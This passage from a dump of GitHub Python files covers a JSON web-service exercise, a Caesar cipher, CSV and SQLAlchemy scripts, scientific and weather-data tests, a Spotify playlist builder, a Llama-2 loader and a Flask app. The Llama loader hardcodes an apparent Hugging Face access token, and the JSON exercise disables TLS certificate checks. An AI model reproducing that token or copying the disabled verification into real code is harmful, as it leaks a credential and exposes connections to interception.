The program will prompt for a URL,\n# read the JSON data from that URL using urllib and then parse and extract the\n# comment counts from the JSON data, compute the sum of the numbers in the file\nimport urllib.request, urllib.parse, urllib.error\nimport json\nimport ssl\n\nserviceURL = 'http://py4e-data.dr-chuck.net/comments_1678827.json'\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\ndata = urllib.request.urlopen(serviceURL, context=ctx).read()\ndata = json.loads(data)\ndata = data['comments']\n\ntotal = 0\nfor result in data:\n total += int(result['count'])\n\nprint(total)\n","repo_name":"Tqkoyaki/ArchivesofBabel","sub_path":"Computer Science/Python For Everybody/Chap 13 - Python and Web Services/Exercise_JSON.py","file_name":"Exercise_JSON.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21976643218","text":"from art import logo\r\nprint(logo)\r\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',\r\n 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z','a', 'b', 'c', 'd', \r\n 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\r\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n\r\nalteration= True\r\n\r\nwhile alteration:\r\n\tdirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\r\n\ttext = input(\"Type your message:\\n\").lower()\r\n\tshift = int(input(\"Type the shift number:\\n\"))%26\r\n\t\r\n\t\r\n\tdef encrypt(text, shift):\r\n\t\tshifted=\"\"\r\n\t\tfor letter in text:\r\n\t\t\tif letter in alphabet:\r\n\t\t\t\tposition= alphabet.index(letter)\r\n\t\t\t\tnew= position+ shift\r\n\t\t\t\tnew_letter= alphabet[new]\r\n\t\t\t\tshifted+=new_letter\r\n\t\t\telse:\r\n\t\t\t\tshifted+=letter\r\n\t\tprint(f\"The encoded text is {shifted}\")\r\n\t\r\n\tdef decrypt(plain, amount):\r\n\t\tnewly_shifted=\"\"\r\n\t\tfor alpha in text:\r\n\t\t\tif alpha in alphabet:\r\n\t\t\t\tnew_position= alphabet.index(alpha)\r\n\t\t\t\tnew2= new_position-shift\r\n\t\t\t\tnew_letter2= alphabet[new2]\r\n\t\t\t\tnewly_shifted +=new_letter2\r\n\t\t\telse:\r\n\t\t\t\tnewly_shifted+=alpha\r\n\t\tprint(f\"The decrypted text is {newly_shifted}\")\r\n\t\t\r\n\t\r\n\tif direction==\"encode\":\r\n\t\tencrypt(text, shift)\r\n\telif direction==\"decode\":\r\n\t\tdecrypt(plain=text, amount=shift)\r\n\t\r\n\t\r\n\t\r\n\trestart=input( \"Type 'yes' if you want to go again. 
Otherwise type 'no'\\n\").lower()\r\n\tif restart==\"no\":\r\n\t\talteration= False\r\n\t\tprint(\"Goodbye\")\r\n","repo_name":"Adewale-1/Python_Project","sub_path":"Encryptor.py","file_name":"Encryptor.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8273562544","text":"import csv\nfrom pprint import pprint\n\nFILENAME = r'csv-iris.csv'\nwith open(FILENAME, encoding='utf-8') as file:\n fieldnames = [\n 'sepal_length',\n 'sepal_width',\n 'petal_length',\n 'petal_width',\n 'species'\n ]\n data = csv.DictReader(\n file,\n fieldnames=fieldnames,\n delimiter=',',\n quotechar='\"')\n\n species_dict = {\n '0': 'setosa',\n '1': 'versicolor',\n '2': 'virginica',\n }\n\n for i, row in enumerate(data):\n if i == 0:\n continue\n print(\n row['sepal_length'],\n row['sepal_width'],\n row['petal_length'],\n row['petal_width'],\n species_dict[row['species']]\n )\n","repo_name":"tzielaski/python_szkolenie","sub_path":"csv_dictreader.py","file_name":"csv_dictreader.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8458569989","text":"import unittest\n\ndef rec(f):\n\treturn [round(r.x,11) for r in f.records]\n\nclass TestAggregation(unittest.TestCase):\n\t@classmethod\n\tdef setUpClass(cls):\n\t\tfrom sqlalchemy.orm import sessionmaker, scoped_session\n\t\tfrom sqlalchemy import create_engine\n\t\tfrom databarc.schema import Aggregate_field\n\t\tfrom databarc.aggregator import Daily_aggregator, DMI_daily \n\t\t\n\t\tengine = create_engine('postgresql://arno@/DMI')\n\t\tcls.connection = engine.connect()\n\t\tcls.trans = cls.connection.begin()\n\t\tcls.S = scoped_session(sessionmaker(bind=cls.connection))\n\t\tcls.S.autoflush = False\n\t\t\n# \t\tcls.a = cls.S.query(Aggregate_field).filter_by(station_id=4360, aggregation_interval='day')\n\t\tcls.a = cls.S.query(Aggregate_field).filter(Aggregate_field.station_id==4360, Aggregate_field.name.in_(['d day','f day']))\n\t\tpp = [f.parent for f in cls.a]\n\t\tcls.b = Daily_aggregator.run_threads(pp,DMI_daily,commit=False,num_threads=2)\n\t\n\t@classmethod\n\tdef tearDownClass(cls):\n\t\tcls.S.close()\n\t\tcls.trans.rollback()\n\t\tcls.connection.close()\n\t\n\tdef test_d(self):\n\t\ta = [f for f in self.a if f.code=='d'][0]\n\t\tb = [b.field for b in self.b if b.field.code=='d'][0]\n\t\tself.assertEqual(rec(a),rec(b))\n\t\t\n# \tdef test_t(self):\n# \t\ta = [f for f in self.a if f.code=='t'][0]\n# \t\tb = [b.field for b in self.b if b.field.code=='t'][0]\n# \t\tself.assertEqual(rec(a),rec(b))\n# \t\t\n\t\n\t\t\nif __name__ == '__main__':\n unittest.main(exit=False)","repo_name":"betaplane/databarc","sub_path":"databarc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17138966046","text":"import pytest\n\nfrom pathlib import Path\n\nfrom scipy import ndimage\nimport numpy as np\n\nimport ncempy.algo as nalgo\nimport ncempy.io as nio\nfrom ncempy.algo import stack_align as stack_align_algo\n\n\n@pytest.fixture\ndef data_location():\n # Get the location of the test data files\n test_path = Path(__file__).resolve()\n root_path = test_path.parents[1]\n return root_path / Path('data')\n\n\ndef test_rebin():\n aa = np.ones((50, 50), dtype='<u2')\n\n # Test sum and uint16\n bb = nalgo.rebin(aa, 2, funcType='sum')\n\n assert bb[0, 0] 
== 4\n\n aa = np.ones((50, 50), dtype='f')\n\n # Test mean and float\n bb = nalgo.rebin(aa, 2, funcType='mean')\n\n assert bb[0, 0] == 1.0\n\ndef test_stack_align_cross(data_location):\n\n with nio.emd.fileEMD(data_location / Path('Acquisition_18.emd')) as f0:\n dd, md = f0.get_emdgroup(f0.list_emds[0])\n\n # Create a stack with known shifts\n stack0 = np.zeros((3, *dd.shape), dtype=dd.dtype)\n shifts0 = np.asarray(((range(0, -6, -2)), (range(0, 6, 2)))).T\n for ii, s in enumerate(shifts0):\n stack0[ii, :, :] = ndimage.shift(dd, s, mode='mirror')\n\n # Test static alignment (reference is first image in stack)\n out_stack, out_stack_shifts = stack_align_algo(stack0, align_type='static')\n\n for sh_static, known_shift in zip(shifts0, out_stack_shifts):\n assert sh_static[0] == -known_shift[0]\n assert sh_static[1] == -known_shift[1]\n\n # Test dynamic alignment (reference is n-1 image in stack)\n out_stack, out_stack_shifts = stack_align_algo(stack0, align_type='dynamic')\n\n for sh_dynamic, known_shift in zip(shifts0, out_stack_shifts):\n assert sh_dynamic[0] == -known_shift[0]\n assert sh_dynamic[1] == -known_shift[1]\n\n\ndef test_moments():\n \"\"\"Test on a rotated line\"\"\"\n\n ang = 35 # degree\n sh = (2, -2)\n\n # Create a a simple line\n aa = np.zeros((101, 101))\n aa[50, 1:-1] = 1\n aa = nalgo.rotateImage(aa, ang * np.pi / 180.)\n aa = nalgo.shiftImage(aa, sh)\n\n M = nalgo.moments(aa)\n mc = nalgo.moments_central(aa)\n\n c = nalgo.centroid(M) # the center\n print('centroid = {}'.format(c))\n for mm, nn in zip(sh, c):\n assert mm + 50 == round(nn)\n\n th = nalgo.moment_angle(mc) + np.pi/2. # in radians\n assert ang == round(th * 180 / np.pi)\n\n\ndef test_moments_dtype():\n \"\"\"Test that moments are calculated correctly with uint8 input dtype\"\"\"\n # Create test image\n YY, XX = np.meshgrid(np.linspace(0, 24, 25), np.linspace(0, 24, 25))\n RR = np.sqrt((XX - 24)**2 + (YY - 24)**2)\n RR = 255 * np.abs((RR / RR.max()) - 1)\n\n c1 = nalgo.centroid(nalgo.moments(RR))\n c2 = nalgo.centroid(nalgo.moments(RR.astype(np.uint8)))\n\n assert int(c1[0]) == int(c2[0])\n assert int(c1[1]) == int(c2[1])\n\n\ndef test_fourierShift():\n \"\"\"Test on a simple dataset\"\"\"\n\n im = np.eye(10, 10)\n im_sh = nalgo.shiftImage(im, (2, 0))\n assert np.round(im_sh[2, 0]) == 1\n im_sh = nalgo.shiftImage(im, (0, 2))\n assert np.round(im_sh[0, 2]) == 1\n\n\ndef test_fourierRotate():\n \"\"\"Test that it works\"\"\"\n im = np.eye(10, 10)\n\n theta = 3 * np.pi / 180.\n im_rot = nalgo.rotateImage(im, theta)\n\n im_rot = nalgo.rotateImage(im, theta, pad=True)\n assert im_rot.shape[0] == 12\n\n\ndef test_fourierShear():\n \"\"\"Test that it works\"\"\"\n im = np.eye(10, 10)\n\n im_shear = nalgo.shearImage(im, 0, 0.5)\n","repo_name":"ercius/openNCEM","sub_path":"ncempy/test/test_algo.py","file_name":"test_algo.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"81"} +{"seq_id":"72648068745","text":"from ..common.config import DataConfig\nfrom collections import defaultdict\nfrom pprint import pprint\n\nimport os\n\n\ndef analyze_class_counts():\n train_counter = defaultdict(int)\n test_counter = defaultdict(int)\n\n def count_under_path(path, counter):\n folders = os.listdir(path)\n for folder in folders:\n counter[folder] += len(os.listdir(os.path.join(path, folder)))\n return counter\n\n return count_under_path(DataConfig.PATHS['TRAINING_PROCESSED_DATA'], train_counter), count_under_path(\n 
DataConfig.PATHS['VALID_PROCESSED_DATA'], test_counter)\n\n\ndef main():\n train, test = analyze_class_counts()\n pprint(train)\n pprint(test)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kacperkan/gesture-classifier-training-framework","sub_path":"api/src/data_processing/data_analyze.py","file_name":"data_analyze.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5551933529","text":"#!/usr/bin/env python\n\"\"\"Tests for `agrometeo` package.\"\"\"\n# pylint: disable=redefined-outer-name\nimport numpy as np\n\nimport agrometeo as agm\n\n\ndef test_agrometeo():\n # test core functions\n agm_ds = agm.AgrometeoDataset(region=\"Pully, Switzerland\")\n assert agm_ds.CRS is not None\n num_stations = len(agm_ds.stations_gdf)\n assert num_stations >= 1\n start_date = \"2022-03-22\"\n end_date = \"2022-03-23\"\n # test that variable can be an ECV following the meteostations-geopy nomenclature, a\n # variable name following the agrometeo nomenclature and a variable code (as str or\n # int) following the agrometeo nomenclature\n for variable in [\"temperature\", \"Precipitation\", \"1\", 1]:\n ts_df = agm_ds.get_ts_df(\n variable=variable, start_date=start_date, end_date=end_date\n )\n assert len(ts_df.columns) == num_stations\n ts_gdf = agm_ds.get_ts_gdf(\n variable=variable, start_date=start_date, end_date=end_date\n )\n assert len(ts_gdf) == num_stations\n assert ts_gdf[\"geometry\"].isna().sum() == 0\n\n # test plotting\n # use `add_basemap=False` to avoid having to mock contextily's requests\n ax = agm.plot_temperature_map(ts_gdf, add_basemap=False)\n assert len(ax.get_title()) > 0\n ax = agm.plot_temperature_map(ts_gdf, title=False, add_basemap=False)\n assert len(ax.get_title()) == 0\n ax = agm.plot_temperature_map(ts_gdf, title=\"some-title\", add_basemap=False)\n assert len(ax.get_title()) > 0\n assert len(ax.collections[0].get_array()) == num_stations\n ts_columns = ts_gdf.columns.drop(\"geometry\")\n axes = [\n agm.plot_temperature_map(\n ts_gdf,\n dt=dt,\n add_basemap=False,\n )\n for dt in [ts_columns[0], ts_columns[-1]]\n ]\n assert not np.array_equal(\n axes[0].collections[0].get_array(), axes[1].collections[0].get_array()\n )\n # test other args\n agm.plot_temperature_map(ts_gdf, add_basemap=False, plot_kws={\"cmap\": \"Spectral\"})\n agm.plot_temperature_map(ts_gdf, add_basemap=False, append_axes_kws={\"pad\": 0.4})\n","repo_name":"martibosch/agrometeo-geopy","sub_path":"tests/test_agrometeo.py","file_name":"test_agrometeo.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20707568379","text":"# Implementar la funcion listar_pesos, que devuelva el historial de pesos para una persona dada.\n# Debe validar:\n# - que el ID de la persona ingresada existe (reutilizando las funciones ya implementadas).\n# Debe devolver:\n# - Lista de (fecha, peso), donde fecha esta representado por el siguiente formato: AAAA-MM-DD.\n# Ejemplo:\n# [\n# ('2018-01-01', 80),\n# ('2018-02-01', 85),\n# ('2018-03-01', 87),\n# ('2018-04-01', 84),\n# ('2018-05-01', 82),\n# ]\n# - False en caso de no cumplir con alguna validacion.\n\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom ejercicio_04 import buscar_persona\nfrom ejercicio_06 import PersonaPeso\n\n\nBase = declarative_base()\n\n\nengine = 
create_engine('mysql://root:datos@localhost:3306/soporte_practica_03')\nBase.metadata.bind = engine\nDBSession = sessionmaker()\nDBSession.bind = engine\nsession = DBSession()\n\n\ndef listar_pesos(idPersona):\n per = buscar_persona(idPersona)\n listaper = []\n if per == False:\n return False\n else:\n pesos = session.query(PersonaPeso).filter_by(idPersona=idPersona).all()\n for p in pesos:\n pp = (p.fecha.strftime(\"%Y-%m-%d\"), p.peso)\n listaper.append(pp)\n return listaper\n\n\n","repo_name":"alesandroninazarena/frro-soporte-2019-06","sub_path":"Practico-03(a)/ejercicio_08.py","file_name":"ejercicio_08.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37713040908","text":"# 长度最小的连续子数组\n# 注意并不是要求里面数字是连续的\n\nfrom typing import List\n\n\nclass Solution:\n # def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n # if not nums:\n # return 0\n #\n # n = len(nums)\n # ans = n + 1\n # start, end = 0, 0\n # total = 0\n # while end < n:\n # total += nums[end]\n # while total >= s:\n # ans = min(end - start + 1, ans)\n # total -= nums[start]\n # start += 1\n # end += 1\n #\n # return 0 if ans == n + 1 else ans\n\n # 暴力法,超时\n # def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n # if not nums:\n # return 0\n #\n # n = len(nums)\n # res = n + 1\n # for i in range(n):\n # total = 0\n # for j in range(i, n): # 能用 for 循环尽量用 for 循环\n # total += nums[j]\n # if total >= s:\n # res = min(res, j - i + 1)\n # break\n # return 0 if res == n + 1 else res\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n if not nums:\n return 0\n\n n = len(nums)\n res = n + 1\n i, j = 0, 0\n total = 0\n while j < n:\n total += nums[j]\n while total >= s:\n res = min(res, j - i + 1)\n total -= nums[i]\n i += 1\n j += 1\n return 0 if res == n + 1 else res\n\n\n\nobj = Solution()\ns = 7\nnums = [2,3,1,2,4,3]\nprint(obj.minSubArrayLen(s, nums))\n\ns = 100\nnums = []\nprint(obj.minSubArrayLen(s, nums))\n\ns = 11\nnums = [1,2,3,4,5]\nprint(obj.minSubArrayLen(s, nums))\n\ns = 3\nnums = []\nprint(obj.minSubArrayLen(s, nums))\n","repo_name":"BruceHi/leetcode","sub_path":"month6/minSubArrayLen.py","file_name":"minSubArrayLen.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"6731191780","text":"#from qgis.gui import *\n#from qgis.core import *\n#from qgis.PyQt import QtCore, QtGui, QtWidgets\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport time\n\nlistUTC = [-12, -11, -10, -9.5, -9, -8, -7, \n -6, -5, -4, -3.5, -3, -2, -1, 0,\n 1, 2, 3, 3.5, 4, 4.5, 5, 5.5, 5.75, \n 6, 6.5, 7, 8, 8.75, 9, 9.5, 10, 10.5,\n 11, 12, 12.75, 13, 14]\n\nclass Ui_gpxWindow(object):\n def setupUi(self, gpxWindow):\n gpxWindow.setObjectName(\"gpxWindow\")\n gpxWindow.resize(399, 363)\n self.buttonBox = QtWidgets.QDialogButtonBox(gpxWindow)\n self.buttonBox.setGeometry(QtCore.QRect(210, 240, 161, 32))\n self.buttonBox.setOrientation(QtCore.Qt.Horizontal)\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.label = QtWidgets.QLabel(gpxWindow)\n self.label.setGeometry(QtCore.QRect(30, 100, 171, 16))\n self.label.setObjectName(\"label\")\n self.groupBox = dropedit(gpxWindow)\n self.groupBox.setGeometry(QtCore.QRect(20, 10, 351, 71))\n self.groupBox.setObjectName(\"groupBox\")\n self.toolButtonGPX = 
QtWidgets.QToolButton(self.groupBox)\n self.toolButtonGPX.setGeometry(QtCore.QRect(320, 30, 25, 19))\n self.toolButtonGPX.setObjectName(\"toolButtonGPX\")\n self.lineEditPathGPX = QtWidgets.QLineEdit(self.groupBox)\n self.lineEditPathGPX.setGeometry(QtCore.QRect(20, 30, 291, 20))\n self.lineEditPathGPX.setObjectName(\"lineEditPathGPX\")\n self.label_2 = QtWidgets.QLabel(gpxWindow)\n self.label_2.setGeometry(QtCore.QRect(30, 140, 161, 16))\n self.label_2.setObjectName(\"label_2\")\n self.checkBoxKeep = QtWidgets.QCheckBox(gpxWindow)\n self.checkBoxKeep.setGeometry(QtCore.QRect(30, 215, 221, 17))\n self.checkBoxKeep.setObjectName(\"checkBoxKeep\")\n self.progressBar = QtWidgets.QProgressBar(gpxWindow)\n self.progressBar.setEnabled(True)\n self.progressBar.setGeometry(QtCore.QRect(40, 310, 331, 23))\n self.progressBar.setProperty(\"value\", 0)\n self.progressBar.setObjectName(\"progressBar\")\n self.spinBoxInterpol = QtWidgets.QSpinBox(gpxWindow)\n self.spinBoxInterpol.setGeometry(QtCore.QRect(200, 100, 171, 22))\n self.spinBoxInterpol.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.spinBoxInterpol.setMinimum(0)\n self.spinBoxInterpol.setMaximum(3600)\n self.spinBoxInterpol.setSingleStep(5)\n self.spinBoxInterpol.setProperty(\"value\", 120)\n self.spinBoxInterpol.setObjectName(\"spinBoxInterpol\")\n self.toolButtonUpUTC = QtWidgets.QToolButton(gpxWindow)\n self.toolButtonUpUTC.setGeometry(QtCore.QRect(355, 139, 16, 12))\n self.toolButtonUpUTC.setArrowType(QtCore.Qt.UpArrow)\n self.toolButtonUpUTC.setObjectName(\"toolButtonUpUTC\")\n self.toolButtonUpUTC.clicked.connect(self.upArrowPress)\n self.toolButtonDownUTC = QtWidgets.QToolButton(gpxWindow)\n self.toolButtonDownUTC.setGeometry(QtCore.QRect(355, 149, 16, 12))\n self.toolButtonDownUTC.setArrowType(QtCore.Qt.DownArrow)\n self.toolButtonDownUTC.setObjectName(\"toolButtonDownUTC\")\n self.toolButtonDownUTC.clicked.connect(self.downArrowPress)\n self.lineEditUTC = QtWidgets.QLineEdit(gpxWindow)\n self.lineEditUTC.setGeometry(QtCore.QRect(200, 140, 156, 20))\n self.lineEditUTC.setObjectName(\"lineEditUTC\")\n self.lineEditUTC.setReadOnly(True)\n offset = time.timezone if (time.localtime().tm_isdst == 0) else time.altzone\n self.currentUTC = offset /60 /60 * -1\n for i in range(len(listUTC)) :\n if listUTC[i] == self.currentUTC :\n self.currentIndex = i\n break\n else : \n self.currentIndex = 14\n self.setUTCstr(self.currentUTC)\n self.label_3 = QtWidgets.QLabel(gpxWindow)\n self.label_3.setGeometry(QtCore.QRect(30, 180, 131, 16))\n self.label_3.setObjectName(\"label_3\")\n self.spinBoxDecalage = QtWidgets.QSpinBox(gpxWindow)\n self.spinBoxDecalage.setGeometry(QtCore.QRect(200, 180, 171, 22))\n self.spinBoxDecalage.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.spinBoxDecalage.setMinimum(0)\n self.spinBoxDecalage.setMaximum(3600)\n self.spinBoxDecalage.setSingleStep(5)\n self.spinBoxDecalage.setProperty(\"value\", 0)\n self.spinBoxDecalage.setObjectName(\"spinBoxDecalage\")\n self.labelNbSelect = QtWidgets.QLabel(gpxWindow)\n self.labelNbSelect.setGeometry(QtCore.QRect(40, 280, 331, 20))\n self.labelNbSelect.setObjectName(\"labelNbSelect\")\n\n self.retranslateUi(gpxWindow)\n QtCore.QMetaObject.connectSlotsByName(gpxWindow)\n\n def retranslateUi(self, gpxWindow):\n _translate = QtCore.QCoreApplication.translate\n gpxWindow.setWindowTitle(_translate(\"gpxWindow\", \"Ajout par GPX\"))\n self.label.setText(_translate(\"gpxWindow\", \"Temps d\\'interpolation maximal 
(s)\"))\n self.groupBox.setTitle(_translate(\"gpxWindow\", \"Chemin GPX\"))\n self.toolButtonGPX.setText(_translate(\"gpxWindow\", \"...\"))\n self.label_2.setText(_translate(\"gpxWindow\", \"Décalage Horaire ±HH:MM (UTC)\"))\n self.checkBoxKeep.setText(_translate(\"gpxWindow\", \"Conserver les coordonnées existantes\"))\n self.toolButtonUpUTC.setText(_translate(\"gpxWindow\", \"...\"))\n self.toolButtonDownUTC.setText(_translate(\"gpxWindow\", \"...\"))\n self.label_3.setText(_translate(\"gpxWindow\", \"Décalage temporel additionnel (s)\"))\n self.labelNbSelect.setText(_translate(\"gpxWindow\", \" Le traitement s\\'appliquera sur les 0 photos sélectionnées.\"))\n\n def upArrowPress(self) :\n if self.currentIndex < 37 :\n self.currentIndex += 1\n self.currentUTC = listUTC[self.currentIndex]\n self.setUTCstr(self.currentUTC)\n else :\n pass\n\n\n def downArrowPress(self) :\n if self.currentIndex > 0 :\n self.currentIndex -= 1\n self.currentUTC = listUTC[self.currentIndex]\n self.setUTCstr(self.currentUTC)\n else :\n pass\n\n def setUTCstr(self, utc) :\n strSign = '+' if utc >= 0 else '-'\n strHour = str(int(abs(utc))) if int(abs(utc)) > 9 else '0' + str(int(abs(utc)))\n \n if abs(utc - int(utc)) == 0.25 :\n strMin = '15'\n elif abs(utc - int(utc)) == 0.5 :\n strMin = '30'\n elif abs(utc - int(utc)) == 0.75 :\n strMin = '45'\n else :\n strMin = '00'\n \n strUTC = strSign + strHour + ':' + strMin\n \n self.lineEditUTC.setText(strUTC)\n\n\n\nclass dropedit(QtWidgets.QGroupBox): \n\n def __init__(self, parent=None):\n super(dropedit, self).__init__(parent)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, event):\n event.accept()\n \n def dropEvent(self, event):\n fileURL = event.mimeData().urls()[0].toString()\n try :\n fileName = fileURL.split('file:///')[1]\n except :\n fileName = fileURL.split('file:')[1]\n \n for child in self.children(): \n if child.metaObject().className() == \"QLineEdit\":\n child.setText(fileName)\n","repo_name":"frpin33/geoRef_QGIS","sub_path":"ui_importGPXWindow.py","file_name":"ui_importGPXWindow.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27719752692","text":"import numpy as np\ncount = np.array([[1,1],[1,0]])\ndef fibonacci(n):\n global count\n if not isinstance(n, int):\n print ('Invalid Input')\n return None\n if n < 0:\n print ('Invalid Input')\n return None\n A = np.array([[1,1],[1,0]])\n for a in range(1,n):\n \t\tcount = np.dot(count,A)\n \t\nfibonacci(5)\nprint (count[0][0])","repo_name":"howard31622/fibonacci-algorithm","sub_path":"fib5.py","file_name":"fib5.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41356777807","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.\n\nNote that the row index starts from 0.\nExample:\n\nInput: 3\nOutput: [1,3,3,1]\nFollow up:\nCould you optimize your algorithm to use only O(k) extra space?\n构造杨辉三角\n\"\"\"\n\n\nclass Solution:\n def genRow(self, numRows):\n \"\"\"\n :type numRows: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n\n for i in range(1, numRows + 2):\n if i <= 2:\n result = [1 for i in range(i)]\n continue\n current_line = []\n for j in range(i):\n if j == 0 or j == (i - 1):\n current_line.append(1)\n else:\n tmp = result[j] + result[j - 1]\n current_line.append(tmp)\n result = current_line\n 
return result\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.getRow(1))\n","repo_name":"misslibra/algorithms","sub_path":"python/pascals-triangle-II.py","file_name":"pascals-triangle-II.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72960176265","text":"from torch import cuda, bfloat16\nimport transformers\n\nmodel_id = 'meta-llama/Llama-2-7b-chat-hf'\n\ndevice = 'cpu'\n\n# set quantization configuration to load large model with less GPU memory\n# this requires the `bitsandbytes` library\nbnb_config = transformers.BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_quant_type='nf4',\n bnb_4bit_use_double_quant=True,\n bnb_4bit_compute_dtype=bfloat16,\n load_in_4bit_cpu_offload=True, # Load 4-bit model on CPU\n load_in_8bit_fp32_cpu_offload=True # Try adding this\n)\n\n\n# begin initializing HF items, need auth token for these\nhf_auth = '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'\nmodel_config = transformers.AutoConfig.from_pretrained(\n model_id,\n use_auth_token=hf_auth\n)\n\nmodel = transformers.AutoModelForCausalLM.from_pretrained(\n model_id,\n trust_remote_code=True,\n config=model_config,\n quantization_config=bnb_config,\n device_map='auto',\n use_auth_token=hf_auth\n)\nmodel.eval()\nprint(f\"Model loaded on {device}\")","repo_name":"madhurish/retrival_augmented_llm","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37591579337","text":"import requests\nfrom bs4 import BeautifulSoup\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv(\"../../EnvVar/.env.txt\")\n\nClient_ID = os.getenv(\"CLIENT_ID\")\nClient_Secret = os.getenv(\"CLIENT_SECRET\")\nRedirect_Url = os.getenv(\"REDIRECT_URL\")\n\ndate = input(\"Billboard Hot 100 Date (YYYY-MM-DD in this format): \")\nresponse = requests.get(f\"https://www.billboard.com/charts/hot-100/{date}\")\nresponse.raise_for_status()\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\nsongs = soup.select(\"li h3\", class_=\"c-title\")\n\nsong_list = [song.getText().strip() for song in songs]\n\n# Spotify Authentication\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=Client_ID,\n client_secret=Client_Secret,\n redirect_uri=Redirect_Url,\n scope=\"playlist-modify-private\"))\n\nuser_id = sp.current_user()[\"id\"]\n\nyear = date.split(\"-\")[0]\nsong_uris = []\n\nfor song in song_list:\n result = sp.search(q=f\"track:{song} year:{year}\", type=\"track\")\n try:\n uri = result[\"tracks\"][\"items\"][0][\"uri\"]\n song_uris.append(uri)\n except IndexError:\n print(f\"In Spotify {song} doesn't exist.\")\n\nplaylist = sp.user_playlist_create(user=user_id, name=f\"{date} Billboard 100\", public=False)\nprint(playlist)\n\nsp.playlist_add_items(playlist_id=playlist[\"id\"], items=song_uris)\n","repo_name":"aysenurekentok/100-days-of-code-python","sub_path":"day-46-billboard-hot-100-spotify-list/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3372420208","text":"from flask import request, jsonify, render_template, make_response\nfrom app import app\nimport os, sys, json\n\nsys.path.append(\"%s/../src\" % os.path.dirname(os.path.realpath(__file__)))\n\nfrom models import *\nimport 
tools\n\n@app.template_global()\ndef active_pages():\n return [\n 'matches',\n 'worlds',\n 'guilds',\n 'emblems'\n ]\n\n@app.route('/')\n@app.route('/index')\ndef index():\n matches = Match.get_current()\n resp = make_response(render_template('index.html', **locals()))\n resp.set_cookie('Test_Cookie', 'This is a cookie value')\n return resp\n\n@app.route('/matches')\n@app.route('/matches/<int:match_id>')\ndef matches(match_id=None):\n if match_id is not None:\n match = Match.get(Match.id==match_id)\n else:\n match = None\n matches = Match.get_current()\n\n return render_template('matches.html', **locals())\n\n@app.route('/worlds')\n@app.route('/worlds/<int:world_id>')\ndef worlds(world_id=None):\n if world_id is not None:\n world = World.get(World.id==world_id)\n else:\n world = None\n worlds = World.select()\n\n resp = make_response(render_template('worlds.html', **locals()))\n\n if world is not None:\n resp.set_cookie('World_visited', world.name, expires=datetime.utcnow() + timedelta(days=365))\n\n return resp\n\n@app.route('/guilds')\n@app.route('/guilds/<int:guild_id>')\ndef guilds(guild_id=None):\n if guild_id is not None:\n guild = Guild.get(Guild.id==guild_id)\n else:\n guild = None\n guilds = Guild.select()\n\n return 